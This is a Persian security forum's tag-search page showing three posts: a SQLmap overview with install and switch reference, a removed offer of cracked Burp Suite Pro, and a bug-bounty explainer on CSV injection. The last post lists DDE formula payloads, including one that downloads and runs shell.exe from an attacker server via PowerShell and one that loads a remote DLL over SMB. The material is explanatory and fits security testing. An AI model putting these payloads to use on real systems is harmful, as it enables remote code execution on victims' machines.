با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'آسیب پذیری'.
3 نتیجه پیدا شد
-
سلام به همه ایران سایبری ها امروز آمدیم تا شما رو با یکی از ابزار های هک آشنا کنیم پس تا آخر مطلب با ما همراه باشید SQLmap درباره SQLmap Sqlmap یک ابزار تست نفود متن باز است که به وسیله آن می توان تست خودکار آسیب پذیری تزریق به پایگاه داده یا sql injection انجام داد. این ابزار با استفاده از یک موتور قدرتمند توانسته است خود را به عنوان یکی از بهترین ابزار های تست نفوذ پایگاه داده معرفی کند و با ویژگی های خاص خود به جایگاه مخصوصی میان متخصصان تست نفوذ و هکرها دست یابد. Sqlmap دارای امکانات بسیار خوبی است که امور تست نفوذ را ساده تر کرده است. دسترسی به تمام اطلاعات موجود در دیتابیس، اجرای دستورات سیستمی و استخراج اطلاعات موجود در پایگاه داده در قالب فایل از این دسته امکانات می باشد. ۵ نوع مختلف از حمله sql injection توسط این ابزار پشتیبانی می شود که به شرح زیر میباشند: Boolean-based blind SQL Injection Time-Based Blind SQL injection Error-Based SQL injection Union Query-Based SQL injection Stacked Queries ویزگی های عمومی پشتیبانی کامل از MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB اتصال مستقیم و دائمی به دیتابیس قابلیت اتصال به ابزار های جانبی مانند Burp proxy و webscarab پشتیبانی از googl e dork تست تزریق از طریق پارامتر های GET، POST ، referrer و مقادیر موجود در کوکی و user agent پشتیبانی از مدل های تصدیق هویت HTTP مانند basic و NTLM پشتیبانی از HTTPS توانایی اتصال از طریق پروکسی واسط و HTTPS قابلیت تعیین referrer و user agent خاص قابلیت شناسایی و کشف اتوماتیک فرم های وب ذخیره سازی تمام log ها ویژگی های جمع آوری اطلاعات و جمع آوری داده شناسایی نوع و نسخه نرم افزار مدیریت پایگاه داده موجود در هدف شناسایی سیستم عامل و نسخه آن جمع آوری اطلاعات کاربران پایگاه داده پشتیبانی از جمع آوری اطلاعات پسورد های هش شده ، سطوح دسترسی، قوانین پایگاه داده ، جداول و ستون ها کرک رمز عبور های هش شده انجام brute force برای یافتن جداول و سطون ها استخراج تمامی اطلاعات موجود در دیتابیس امکانات کنترلی تزریق به function های خاص یک برنامه وب امکان دانلود و آپلود فایل اجرای دستور برقراری یک ارتباط خصوصی میان نفوذگر و هدف قابلیت اجرای شل کد های متاسپلویت در حافظه پشتیبانی از پیلود های متاسپلویت پشتیبانی از عملیات افزایش سطح دسترسی نحوه نصب می توانید از اینجا ابزار sqlmap را دانلود نمایند. همچنین قابلیت نصب مستقیم از طریق دستور git در سیستم عامل لینوکس فراهم گردیده است: کد: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev همچنین قابل ذکر است که برای راه اندازی sqlmap سیستم به یکی از نسخه های ۲٫۶٫x یا ۲٫۷٫x برنامه active python نیاز دارد. تعدادی از سویچ ها و دستوارت sqlmap را به همراه توضیحات در جدول زیر می توانید مشاهده کنید سویچ / دستور توضیحات -u مشخص نمودن آدرس هدف برای برنامه –current-db استخراج دیتابیس اصلی برنامه –dbs استخراج تمامی دیتابیس های موحود –dbms= مشخص نمودن نوع دایتابیس برای برنامه –tables استخراج تمام جداول موجود در پایگاه داده –columns استخراج تمام ستون های یک جدول -g استفاده از دورک گوگل از این که با من همراه بودید متشکرم لطفا با دنبال کردن من و نظر هاتون به من انرژی بدید پایان
-
Burp Suite Professional 1.7.33 Pro + Crack
یک موضوع پاسخی ارسال کرد برای debrez در ابزار و اسکریپت های امنیتی
سلام نسخه ی جدید 1.7.33 نرم افزار BrupSuite همراه با کرک سالم منتشر شد. Brup Suite : ابزاری قدتمند جهت تست امنیت وبسایتها است. ابزارهای کمی وجود دارند که بتوانند تمامی تستهای مورد نیاز برای سنجش میزان نفوذ پذیری یک وبسایت را انجام دهند. این برنامه ادعا میکند که قادر است تمامی انواع تستها از آنالیزهای اولیه گرفته تا پیدا کردن نقاط ضعف و اکسپلویت نویسی را میتواند در این برنامه یه صورت یکپارچه و در کنار هم انجام دهد. این ویژگی باعث میشود تا برای تست هر مورد به سراغ برنامه های مجزا نروید. بخش اعظم تستهای این برنامه به صورت خودکار انجام میشود و با دریافت حداقل اطلاعات حداکثر نتایج به شما نشان داده خواهد شد. به علت وجود بدافزار حذف شد! لینک اسکن VirusTotal 0/52- 17 پاسخ
-
- 2
-
-
- brup suite
- brute
- (و 7 مورد دیگر)
-
آسیب پذیری Csv Injection در باگ بانتی (bug Bounty)
یک موضوع پاسخی ارسال کرد برای 1314CK.0FF3NSIV3 در باگ بانتی (Bug Bounty)
با سلام در گزارشات ارسالی برای باگ بانتی یکی از آسیب پذیری هایی که از اون کاربران جوایز دریافت می کنند آسیب پذیری CSV Injection است که از اهمیت خاصی برخوردار بوده ، بنابراین توضیحات لازمه اولیه را برای شما عزیزان ارائه خواهیم داد . برخی از سرویس به کاربران این امکان را می دهند تا داده های تا فایل های خود را بصورت CSV آپلود کنند حال اگر به طور نادرست انجام شود این قابلیت می توان سبب ایجاد آسیب پذیری تزریق CSV شود که در ادامه به اون می پردازیم . برخی این آسیب پذیری را با Seveity کم و برخی آن را به عنوان یک آسیب پذیری Critical طبقه بندی می کنند.حال پسوندی است که ادمین سرور برای آپلودمی تواند به کاربران اجازه آپلوده فایل CSV را بدهد بنابراین در بیشتر bug-bouny آن را خارج از محدوده Policy در نظر می گیرند. با این حال ، این متد هنوز یک آسیب پذیری واقعا حساس است که بسیاری از مردم از وجود آن اطلاعی ندارند بیشتر کاربران با اکسل آشنایت دارند می دانند که اکسل می تواند از فرمول استفاده کند. به عنوان مثال فرمول زیر دو عدد باهم جمع می شود : =5+4 همانطور که می بینید فرمول "= 4 + 5" عدد 9 را نشان می دهد. بنابراین از فرمول ها می توان برای انجام انواع کارها استفاده کرد پس در تست آسیبپذیری جهت اجرای ورودی برنامه ها استفاده کرد. فرض کنید یک سرویس به سرورها اجازه می دهد به کاربران اجازه آپلوده فایل CSV را بدهد . برای تست CSV Injection می توانیم فایلی را با فرمول نویسی اکسل به عنوان مقدار به سمت سرور بفرستیم . اگر فرمول در هر sheet جاسازی شود ، آسیب پذیری داریم. چند نمونه پیلوت براتون قرار میدهم : # pop a calc DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 =2+5+cmd|' /C calc'!A0 # pop a notepad =cmd|' /C notepad'!'A1' # powershell download and execute =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 # msf smb delivery with rundll32 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 میبینید که هر پیلوت به DDE یعنی Dynamic Data Exchange مشهور هستند که می تواند بعدها درجهت تکامل آسیب پذیری های پیشرفته تری استفاده شوند در تاپیک بعدی نحوه بهره برداری آن را توضیح میدهیم ....
